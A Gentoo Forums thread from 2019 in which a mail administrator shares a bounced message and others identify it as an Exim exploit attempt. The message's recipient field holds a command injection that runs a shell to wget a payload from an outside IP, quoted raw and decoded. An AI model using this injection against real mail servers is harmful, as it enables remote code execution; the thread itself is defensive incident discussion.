Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
recent mail exploit... anyone know anything about this?
View unanswered posts
View posts from last 24 hours

 
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
Author Message
eccerr0r
Watchman
Watchman


Joined: 01 Jul 2004
Posts: 7380
Location: almost Mile High in the USA

PostPosted: Tue Jul 16, 2019 4:53 pm    Post subject: recent mail exploit... anyone know anything about this? Reply with quote

My mail server just bounced a mail that looks like this:

Code:
Return-Path: <root@sab.com>                                                     
Received: from sab.com (tscoco07.arvixevps.com [162.254.165.222])               
    by MYMAILSERVER (8.14.9/8.14.4) with SMTP id MYCUSTOMID             
    for <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2fMYIPADDR\x22}}@MYMAILSERVER>; SENTDATE           
Date: RECVDATE                                           
From: root@sab.com                                                             
Message-Id: <CUSTOMID@MYMAILSERVER>                       
Received: 1                                                                     
Received: 2                                                                     
Received: 3                                                                     
Received: 4                                                                     
... to Received: 31
MYMAILSERVER, MYCUSTOMID, MYIPADDR, SENTDATE, RECVDATE, CUSTOMID I hope are self explanatory for a SMTP system and obscured for privacy.

Seems like either a MTA or MUA exploit, but seems more for software parsing these for anti-spam or anti-virus?
_________________
Intel Core i7 2700K@ 4.1GHz/HD3000 graphics/8GB DDR3/180GB SSD
What am I supposed watching?
Back to top
View user's profile Send private message
bunder
Bodhisattva
Bodhisattva


Joined: 10 Apr 2004
Posts: 5907

PostPosted: Tue Jul 16, 2019 5:57 pm    Post subject: Reply with quote

exim maybe?

https://security.gentoo.org/glsa/201906-01

edit: could easily be a web based exploit on the remote server as well
_________________
Neddyseagoon wrote:
The problem with leaving is that you can only do it once and it reduces your influence.

banned from #gentoo since sept 2017
Back to top
View user's profile Send private message
Anon-E-moose
Advocate
Advocate


Joined: 23 May 2008
Posts: 4362
Location: Dallas area

PostPosted: Tue Jul 16, 2019 6:17 pm    Post subject: Reply with quote

I would imagine the sending server got compromised and you're not the only one to get mail.
_________________
Asus m5a99fx, FX 8320 - nouveau, oss4, rx550 for qemu passthrough
Acer laptop E5-575, i3-7100u - i965, alsa
---both---
5.0.13 zen kernel, profile 17.1 (no-pie & modified) amd64-no-multilib
gcc 8.2.0, eudev, openrc, openbox, palemoon
Back to top
View user's profile Send private message
eccerr0r
Watchman
Watchman


Joined: 01 Jul 2004
Posts: 7380
Location: almost Mile High in the USA

PostPosted: Tue Jul 16, 2019 6:41 pm    Post subject: Reply with quote

Yeah, it could be exim. Indeed probably broadcast across as many servers it can figure out which landed on my machine.

I'm still using sendmail -- just hoping it's not affected. I need to work on reissuing my certificates, just had a few expire on me, yikes.
_________________
Intel Core i7 2700K@ 4.1GHz/HD3000 graphics/8GB DDR3/180GB SSD
What am I supposed watching?
Back to top
View user's profile Send private message
freke
Guru
Guru


Joined: 23 Jan 2003
Posts: 547
Location: Somewhere in Denmark

PostPosted: Wed Jul 17, 2019 3:22 pm    Post subject: Reply with quote

It looks like this:

https://forums.gentoo.org/viewtopic-t-1098284.html

Which seems to be Exim-exploit yes...

https://malwaredecoder.com/result/61182e83b606f8fd697901db5c05e257

Seems to suggest it tries to run - run{/bin/sh\t-c\t"wget 199.204.214.40/sbz/198.238.214.15"}
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum